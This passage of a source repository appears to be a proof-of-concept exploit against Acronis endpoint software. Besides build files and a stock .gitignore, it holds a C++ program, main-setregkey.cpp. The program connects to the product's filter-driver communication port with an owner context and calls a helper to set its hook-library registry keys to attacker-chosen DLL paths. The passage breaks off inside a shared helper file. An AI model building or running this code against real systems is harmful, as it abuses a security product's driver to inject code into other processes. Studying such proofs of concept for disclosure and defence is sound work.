├── .gitignore
├── AcronisPoC-SetInjectionRegKey
    ├── AcronisPoC-SetInjectionRegKey.vcxproj
    ├── AcronisPoC-SetInjectionRegKey.vcxproj.filters
    └── main-setregkey.cpp
├── AcronisPoC.sln
├── AcronisPoC
    ├── Acronis-Common.cpp
    ├── Acronis-Common.h
    ├── AcronisPoC.vcxproj
    ├── AcronisPoC.vcxproj.filters
    └── main-readfile.cpp
├── DummyDll
    ├── DummyDll.vcxproj
    ├── DummyDll.vcxproj.filters
    ├── dllmain.cpp
    ├── framework.h
    ├── pch.cpp
    └── pch.h
├── LICENSE
├── README.md
└── Screenshots
    ├── Pasted image 20220711185141.png
    ├── Pasted image 20220714164619.png
    ├── Pasted image 20220714164824.png
    ├── Pasted image 20220714165031.png
    ├── Pasted image 20220714165436.png
    ├── Pasted image 20220714165557.png
    ├── Pasted image 20220714165813.png
    ├── Pasted image 20220714165905.png
    ├── Pasted image 20220714165942.png
    ├── Pasted image 20220714170044.png
    ├── Pasted image 20220714170246.png
    ├── Pasted image 20220714170704.png
    ├── Pasted image 20220714170759.png
    ├── Pasted image 20220714170828.png
    ├── Pasted image 20220714171155.png
    ├── Pasted image 20220714171229.png
    ├── Pasted image 20220714171305.png
    └── Pasted image 20220714171908.png


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
  5 | *.zip
  6 | 
  7 | # User-specific files
  8 | *.rsuser
  9 | *.suo
 10 | *.user
 11 | *.userosscache
 12 | *.sln.docstates
 13 | 
 14 | # User-specific files (MonoDevelop/Xamarin Studio)
 15 | *.userprefs
 16 | 
 17 | # Mono auto generated files
 18 | mono_crash.*
 19 | 
 20 | # Build results
 21 | [Dd]ebug/
 22 | [Dd]ebugPublic/
 23 | [Rr]elease/
 24 | [Rr]eleases/
 25 | x64/
 26 | x86/
 27 | [Ww][Ii][Nn]32/
 28 | [Aa][Rr][Mm]/
 29 | [Aa][Rr][Mm]64/
 30 | bld/
 31 | [Bb]in/
 32 | [Oo]bj/
 33 | [Ll]og/
 34 | [Ll]ogs/
 35 | 
 36 | # Visual Studio 2015/2017 cache/options directory
 37 | .vs/
 38 | # Uncomment if you have tasks that create the project's static files in wwwroot
 39 | #wwwroot/
 40 | 
 41 | # Visual Studio 2017 auto generated files
 42 | Generated\ Files/
 43 | 
 44 | # MSTest test Results
 45 | [Tt]est[Rr]esult*/
 46 | [Bb]uild[Ll]og.*
 47 | 
 48 | # NUnit
 49 | *.VisualState.xml
 50 | TestResult.xml
 51 | nunit-*.xml
 52 | 
 53 | # Build Results of an ATL Project
 54 | [Dd]ebugPS/
 55 | [Rr]eleasePS/
 56 | dlldata.c
 57 | 
 58 | # Benchmark Results
 59 | BenchmarkDotNet.Artifacts/
 60 | 
 61 | # .NET Core
 62 | project.lock.json
 63 | project.fragment.lock.json
 64 | artifacts/
 65 | 
 66 | # ASP.NET Scaffolding
 67 | ScaffoldingReadMe.txt
 68 | 
 69 | # StyleCop
 70 | StyleCopReport.xml
 71 | 
 72 | # Files built by Visual Studio
 73 | *_i.c
 74 | *_p.c
 75 | *_h.h
 76 | *.ilk
 77 | *.meta
 78 | *.obj
 79 | *.iobj
 80 | *.pch
 81 | *.pdb
 82 | *.ipdb
 83 | *.pgc
 84 | *.pgd
 85 | *.rsp
 86 | *.sbr
 87 | *.tlb
 88 | *.tli
 89 | *.tlh
 90 | *.tmp
 91 | *.tmp_proj
 92 | *_wpftmp.csproj
 93 | *.log
 94 | *.tlog
 95 | *.vspscc
 96 | *.vssscc
 97 | .builds
 98 | *.pidb
 99 | *.svclog
100 | *.scc
101 | 
102 | # Chutzpah Test files
103 | _Chutzpah*
104 | 
105 | # Visual C++ cache files
106 | ipch/
107 | *.aps
108 | *.ncb
109 | *.opendb
110 | *.opensdf
111 | *.sdf
112 | *.cachefile
113 | *.VC.db
114 | *.VC.VC.opendb
115 | 
116 | # Visual Studio profiler
117 | *.psess
118 | *.vsp
119 | *.vspx
120 | *.sap
121 | 
122 | # Visual Studio Trace Files
123 | *.e2e
124 | 
125 | # TFS 2012 Local Workspace
126 | $tf/
127 | 
128 | # Guidance Automation Toolkit
129 | *.gpState
130 | 
131 | # ReSharper is a .NET coding add-in
132 | _ReSharper*/
133 | *.[Rr]e[Ss]harper
134 | *.DotSettings.user
135 | 
136 | # TeamCity is a build add-in
137 | _TeamCity*
138 | 
139 | # DotCover is a Code Coverage Tool
140 | *.dotCover
141 | 
142 | # AxoCover is a Code Coverage Tool
143 | .axoCover/*
144 | !.axoCover/settings.json
145 | 
146 | # Coverlet is a free, cross platform Code Coverage Tool
147 | coverage*.json
148 | coverage*.xml
149 | coverage*.info
150 | 
151 | # Visual Studio code coverage results
152 | *.coverage
153 | *.coveragexml
154 | 
155 | # NCrunch
156 | _NCrunch_*
157 | .*crunch*.local.xml
158 | nCrunchTemp_*
159 | 
160 | # MightyMoose
161 | *.mm.*
162 | AutoTest.Net/
163 | 
164 | # Web workbench (sass)
165 | .sass-cache/
166 | 
167 | # Installshield output folder
168 | [Ee]xpress/
169 | 
170 | # DocProject is a documentation generator add-in
171 | DocProject/buildhelp/
172 | DocProject/Help/*.HxT
173 | DocProject/Help/*.HxC
174 | DocProject/Help/*.hhc
175 | DocProject/Help/*.hhk
176 | DocProject/Help/*.hhp
177 | DocProject/Help/Html2
178 | DocProject/Help/html
179 | 
180 | # Click-Once directory
181 | publish/
182 | 
183 | # Publish Web Output
184 | *.[Pp]ublish.xml
185 | *.azurePubxml
186 | # Note: Comment the next line if you want to checkin your web deploy settings,
187 | # but database connection strings (with potential passwords) will be unencrypted
188 | *.pubxml
189 | *.publishproj
190 | 
191 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
192 | # checkin your Azure Web App publish settings, but sensitive information contained
193 | # in these scripts will be unencrypted
194 | PublishScripts/
195 | 
196 | # NuGet Packages
197 | *.nupkg
198 | # NuGet Symbol Packages
199 | *.snupkg
200 | # The packages folder can be ignored because of Package Restore
201 | **/[Pp]ackages/*
202 | # except build/, which is used as an MSBuild target.
203 | !**/[Pp]ackages/build/
204 | # Uncomment if necessary however generally it will be regenerated when needed
205 | #!**/[Pp]ackages/repositories.config
206 | # NuGet v3's project.json files produces more ignorable files
207 | *.nuget.props
208 | *.nuget.targets
209 | 
210 | # Microsoft Azure Build Output
211 | csx/
212 | *.build.csdef
213 | 
214 | # Microsoft Azure Emulator
215 | ecf/
216 | rcf/
217 | 
218 | # Windows Store app package directories and files
219 | AppPackages/
220 | BundleArtifacts/
221 | Package.StoreAssociation.xml
222 | _pkginfo.txt
223 | *.appx
224 | *.appxbundle
225 | *.appxupload
226 | 
227 | # Visual Studio cache files
228 | # files ending in .cache can be ignored
229 | *.[Cc]ache
230 | # but keep track of directories ending in .cache
231 | !?*.[Cc]ache/
232 | 
233 | # Others
234 | ClientBin/
235 | ~$*
236 | *~
237 | *.dbmdl
238 | *.dbproj.schemaview
239 | *.jfm
240 | *.pfx
241 | *.publishsettings
242 | orleans.codegen.cs
243 | 
244 | # Including strong name files can present a security risk
245 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
246 | #*.snk
247 | 
248 | # Since there are multiple workflows, uncomment next line to ignore bower_components
249 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
250 | #bower_components/
251 | 
252 | # RIA/Silverlight projects
253 | Generated_Code/
254 | 
255 | # Backup & report files from converting an old project file
256 | # to a newer Visual Studio version. Backup files are not needed,
257 | # because we have git ;-)
258 | _UpgradeReport_Files/
259 | Backup*/
260 | UpgradeLog*.XML
261 | UpgradeLog*.htm
262 | ServiceFabricBackup/
263 | *.rptproj.bak
264 | 
265 | # SQL Server files
266 | *.mdf
267 | *.ldf
268 | *.ndf
269 | 
270 | # Business Intelligence projects
271 | *.rdl.data
272 | *.bim.layout
273 | *.bim_*.settings
274 | *.rptproj.rsuser
275 | *- [Bb]ackup.rdl
276 | *- [Bb]ackup ([0-9]).rdl
277 | *- [Bb]ackup ([0-9][0-9]).rdl
278 | 
279 | # Microsoft Fakes
280 | FakesAssemblies/
281 | 
282 | # GhostDoc plugin setting file
283 | *.GhostDoc.xml
284 | 
285 | # Node.js Tools for Visual Studio
286 | .ntvs_analysis.dat
287 | node_modules/
288 | 
289 | # Visual Studio 6 build log
290 | *.plg
291 | 
292 | # Visual Studio 6 workspace options file
293 | *.opt
294 | 
295 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
296 | *.vbw
297 | 
298 | # Visual Studio 6 auto-generated project file (contains which files were open etc.)
299 | *.vbp
300 | 
301 | # Visual Studio 6 workspace and project file (working project files containing files to include in project)
302 | *.dsw
303 | *.dsp
304 | 
305 | # Visual Studio 6 technical files
306 | *.ncb
307 | *.aps
308 | 
309 | # Visual Studio LightSwitch build output
310 | **/*.HTMLClient/GeneratedArtifacts
311 | **/*.DesktopClient/GeneratedArtifacts
312 | **/*.DesktopClient/ModelManifest.xml
313 | **/*.Server/GeneratedArtifacts
314 | **/*.Server/ModelManifest.xml
315 | _Pvt_Extensions
316 | 
317 | # Paket dependency manager
318 | .paket/paket.exe
319 | paket-files/
320 | 
321 | # FAKE - F# Make
322 | .fake/
323 | 
324 | # CodeRush personal settings
325 | .cr/personal
326 | 
327 | # Python Tools for Visual Studio (PTVS)
328 | __pycache__/
329 | *.pyc
330 | 
331 | # Cake - Uncomment if you are using it
332 | # tools/**
333 | # !tools/packages.config
334 | 
335 | # Tabs Studio
336 | *.tss
337 | 
338 | # Telerik's JustMock configuration file
339 | *.jmconfig
340 | 
341 | # BizTalk build output
342 | *.btp.cs
343 | *.btm.cs
344 | *.odx.cs
345 | *.xsd.cs
346 | 
347 | # OpenCover UI analysis results
348 | OpenCover/
349 | 
350 | # Azure Stream Analytics local run output
351 | ASALocalRun/
352 | 
353 | # MSBuild Binary and Structured Log
354 | *.binlog
355 | 
356 | # NVidia Nsight GPU debugger configuration file
357 | *.nvuser
358 | 
359 | # MFractors (Xamarin productivity tool) working folder
360 | .mfractor/
361 | 
362 | # Local History for Visual Studio
363 | .localhistory/
364 | 
365 | # Visual Studio History (VSHistory) files
366 | .vshistory/
367 | 
368 | # BeatPulse healthcheck temp database
369 | healthchecksdb
370 | 
371 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
372 | MigrationBackup/
373 | 
374 | # Ionide (cross platform F# VS Code tools) working folder
375 | .ionide/
376 | 
377 | # Fody - auto-generated XML schema
378 | FodyWeavers.xsd
379 | 
380 | # VS Code files for those working on multiple tools
381 | .vscode/*
382 | !.vscode/settings.json
383 | !.vscode/tasks.json
384 | !.vscode/launch.json
385 | !.vscode/extensions.json
386 | *.code-workspace
387 | 
388 | # Local History for Visual Studio Code
389 | .history/
390 | 
391 | # Windows Installer files from build outputs
392 | *.cab
393 | *.msi
394 | *.msix
395 | *.msm
396 | *.msp
397 | 
398 | # JetBrains Rider
399 | *.sln.iml


--------------------------------------------------------------------------------
/AcronisPoC-SetInjectionRegKey/AcronisPoC-SetInjectionRegKey.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{75b2f19c-9811-482e-8037-cf84b4055a30}</ProjectGuid>
 25 |     <RootNamespace>AcronisPoCSetInjectionRegKey</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |     <IncludePath>$(SolutionDir)AcronisPoC\;$(IncludePath)</IncludePath>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <LinkIncremental>false</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |     <IncludePath>$(SolutionDir)AcronisPoC\;$(IncludePath)</IncludePath>
 83 |   </PropertyGroup>
 84 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 85 |     <LinkIncremental>false</LinkIncremental>
 86 |   </PropertyGroup>
 87 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 88 |     <ClCompile>
 89 |       <WarningLevel>Level3</WarningLevel>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 94 |     </ClCompile>
 95 |     <Link>
 96 |       <SubSystem>Console</SubSystem>
 97 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 98 |     </Link>
 99 |   </ItemDefinitionGroup>
100 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
101 |     <ClCompile>
102 |       <WarningLevel>Level3</WarningLevel>
103 |       <FunctionLevelLinking>true</FunctionLevelLinking>
104 |       <IntrinsicFunctions>true</IntrinsicFunctions>
105 |       <SDLCheck>true</SDLCheck>
106 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
107 |       <ConformanceMode>true</ConformanceMode>
108 |     </ClCompile>
109 |     <Link>
110 |       <SubSystem>Console</SubSystem>
111 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
112 |       <OptimizeReferences>true</OptimizeReferences>
113 |       <GenerateDebugInformation>true</GenerateDebugInformation>
114 |     </Link>
115 |   </ItemDefinitionGroup>
116 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
117 |     <ClCompile>
118 |       <WarningLevel>Level3</WarningLevel>
119 |       <SDLCheck>true</SDLCheck>
120 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
121 |       <ConformanceMode>true</ConformanceMode>
122 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
123 |       <AdditionalIncludeDirectories>$(SolutionDir)\AcronisPoC\AcronisPoC;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
124 |     </ClCompile>
125 |     <Link>
126 |       <SubSystem>Console</SubSystem>
127 |       <GenerateDebugInformation>true</GenerateDebugInformation>
128 |     </Link>
129 |   </ItemDefinitionGroup>
130 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
131 |     <ClCompile>
132 |       <WarningLevel>Level3</WarningLevel>
133 |       <FunctionLevelLinking>true</FunctionLevelLinking>
134 |       <IntrinsicFunctions>true</IntrinsicFunctions>
135 |       <SDLCheck>true</SDLCheck>
136 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
137 |       <ConformanceMode>true</ConformanceMode>
138 |       <AdditionalIncludeDirectories>$(SolutionDir)\AcronisPoC\AcronisPoC;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
139 |     </ClCompile>
140 |     <Link>
141 |       <SubSystem>Console</SubSystem>
142 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
143 |       <OptimizeReferences>true</OptimizeReferences>
144 |       <GenerateDebugInformation>true</GenerateDebugInformation>
145 |     </Link>
146 |   </ItemDefinitionGroup>
147 |   <ItemGroup>
148 |     <ClInclude Include="..\AcronisPoC\Acronis-Common.h" />
149 |   </ItemGroup>
150 |   <ItemGroup>
151 |     <ClCompile Include="..\AcronisPoC\Acronis-Common.cpp" />
152 |     <ClCompile Include="main-setregkey.cpp" />
153 |   </ItemGroup>
154 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
155 |   <ImportGroup Label="ExtensionTargets">
156 |   </ImportGroup>
157 | </Project>


--------------------------------------------------------------------------------
/AcronisPoC-SetInjectionRegKey/AcronisPoC-SetInjectionRegKey.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClInclude Include="..\AcronisPoC\Acronis-Common.h">
19 |       <Filter>Header Files</Filter>
20 |     </ClInclude>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClCompile Include="..\AcronisPoC\Acronis-Common.cpp">
24 |       <Filter>Source Files</Filter>
25 |     </ClCompile>
26 |     <ClCompile Include="main-setregkey.cpp">
27 |       <Filter>Source Files</Filter>
28 |     </ClCompile>
29 |   </ItemGroup>
30 | </Project>


--------------------------------------------------------------------------------
/AcronisPoC-SetInjectionRegKey/main-setregkey.cpp:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | #include <Fltuser.h>
 3 | #pragma comment(lib, "FltLib")
 4 | 
 5 | #include <stdio.h>
 6 | #include "Acronis-Common.h"
 7 | 
 8 | int main() {
 9 | 	HRESULT hResult = 0;
10 | 	HANDLE hPort = 0;
11 | 	HANDLE hHeap = GetProcessHeap();
12 | 	DWORD dwBytesReturned = 0;
13 | 	BOOL bRes = FALSE;
14 | 
15 | 	ACRONIS_FLT_CTX aCtx = { 0 };
16 | 	PACRONIS_FLT_MESSAGE pAcronisMessage = (PACRONIS_FLT_MESSAGE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(ACRONIS_FLT_MESSAGE));
17 | 	LPVOID lpOutBuf = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
18 | 
19 | 	const wchar_t* targetx86DllPath = LR"(C:\Users\Student\Desktop\DummyDllx86.dll)";
20 | 	const wchar_t* targetx64DllPath = LR"(C:\Users\Student\Desktop\DummyDllx64.dll)";
21 | 
22 | 	if (!pAcronisMessage) {
23 | 		GLE("HeapAlloc - AcronisMessage");
24 | 		return -1;
25 | 	}
26 | 
27 | 	aCtx.dwContextSwitch = ACRONIS_CTX_OWNER;
28 | 
29 | 	hResult = FilterConnectCommunicationPort(
30 | 		L"\\AcronisNgScanServicePort",
31 | 		0,
32 | 		&aCtx,
33 | 		sizeof(aCtx),
34 | 		NULL,
35 | 		&hPort
36 | 	);
37 | 
38 | 	if (FAILED(hResult)) {
39 | 		GLE("FilterConnectCommunicationPort");
40 | 		printf("\tFLT Status: %lx\n", hResult);
41 | 		CloseHandle(hPort);
42 | 		return -1;
43 | 	}
44 | 
45 | 	puts("Connected to FLT Comm Port, attempting to open file.");
46 | 	bRes = SetRegKeyHookLibs(hPort, targetx86DllPath, targetx64DllPath);
47 | 
48 | 	if (!bRes) {
49 | 		GLE("Failed to set reg keys!");
50 | 		return -1;
51 | 	}
52 | 
53 | 	CloseHandle(hPort);
54 | 	return 0;
55 | 
56 | }
57 | 
58 | 


--------------------------------------------------------------------------------
/AcronisPoC.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30804.86
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AcronisPoC-ReadFile", "AcronisPoC\AcronisPoC.vcxproj", "{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}"
 7 | EndProject
 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AcronisPoC-SetInjectionRegKey", "AcronisPoC-SetInjectionRegKey\AcronisPoC-SetInjectionRegKey.vcxproj", "{75B2F19C-9811-482E-8037-CF84B4055A30}"
 9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DummyDll", "DummyDll\DummyDll.vcxproj", "{B88F1494-66ED-485D-9AEB-3FED074997B9}"
11 | EndProject
12 | Global
13 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
14 | 		Debug|x64 = Debug|x64
15 | 		Debug|x86 = Debug|x86
16 | 		Release|x64 = Release|x64
17 | 		Release|x86 = Release|x86
18 | 	EndGlobalSection
19 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
20 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Debug|x64.ActiveCfg = Debug|x64
21 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Debug|x64.Build.0 = Debug|x64
22 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Debug|x86.ActiveCfg = Debug|Win32
23 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Debug|x86.Build.0 = Debug|Win32
24 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Release|x64.ActiveCfg = Release|x64
25 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Release|x64.Build.0 = Release|x64
26 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Release|x86.ActiveCfg = Release|Win32
27 | 		{D7F0A2CD-DD9B-40DF-A5D0-005643F68BD7}.Release|x86.Build.0 = Release|Win32
28 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Debug|x64.ActiveCfg = Debug|x64
29 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Debug|x64.Build.0 = Debug|x64
30 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Debug|x86.ActiveCfg = Debug|Win32
31 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Debug|x86.Build.0 = Debug|Win32
32 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Release|x64.ActiveCfg = Release|x64
33 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Release|x64.Build.0 = Release|x64
34 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Release|x86.ActiveCfg = Release|Win32
35 | 		{75B2F19C-9811-482E-8037-CF84B4055A30}.Release|x86.Build.0 = Release|Win32
36 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Debug|x64.ActiveCfg = Debug|x64
37 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Debug|x64.Build.0 = Debug|x64
38 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Debug|x86.ActiveCfg = Debug|Win32
39 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Debug|x86.Build.0 = Debug|Win32
40 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Release|x64.ActiveCfg = Release|x64
41 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Release|x64.Build.0 = Release|x64
42 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Release|x86.ActiveCfg = Release|Win32
43 | 		{B88F1494-66ED-485D-9AEB-3FED074997B9}.Release|x86.Build.0 = Release|Win32
44 | 	EndGlobalSection
45 | 	GlobalSection(SolutionProperties) = preSolution
46 | 		HideSolutionNode = FALSE
47 | 	EndGlobalSection
48 | 	GlobalSection(ExtensibilityGlobals) = postSolution
49 | 		SolutionGuid = {95925906-6457-4AE5-955D-BFADFF9AD3FD}
50 | 	EndGlobalSection
51 | EndGlobal
52 | 


--------------------------------------------------------------------------------
/AcronisPoC/Acronis-Common.cpp:
--------------------------------------------------------------------------------
  1 | #include "Acronis-Common.h"
  2 | 
  3 | DWORD64 genPattern(BYTE b) {
  4 | 	DWORD64 retVal = b;
  5 | 	retVal |= retVal << 8;
  6 | 	retVal |= retVal << 16;
  7 | 	retVal |= retVal << 32;
  8 | 	return retVal;
  9 | }
 10 | 
 11 | void DumpHex(const void* data, size_t size) {
 12 | 	char ascii[17];
 13 | 	size_t i, j;
 14 | 	ascii[16] = '\0';
 15 | 	for (i = 0; i < size; ++i) {
 16 | 		printf("%02X ", ((unsigned char*)data)[i]);
 17 | 		if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
 18 | 			ascii[i % 16] = ((unsigned char*)data)[i];
 19 | 		}
 20 | 		else {
 21 | 			ascii[i % 16] = '.';
 22 | 		}
 23 | 		if ((i + 1) % 8 == 0 || i + 1 == size) {
 24 | 			printf(" ");
 25 | 			if ((i + 1) % 16 == 0) {
 26 | 				printf("|  %s \n", ascii);
 27 | 			}
 28 | 			else if (i + 1 == size) {
 29 | 				ascii[(i + 1) % 16] = '\0';
 30 | 				if ((i + 1) % 16 <= 8) {
 31 | 					printf(" ");
 32 | 				}
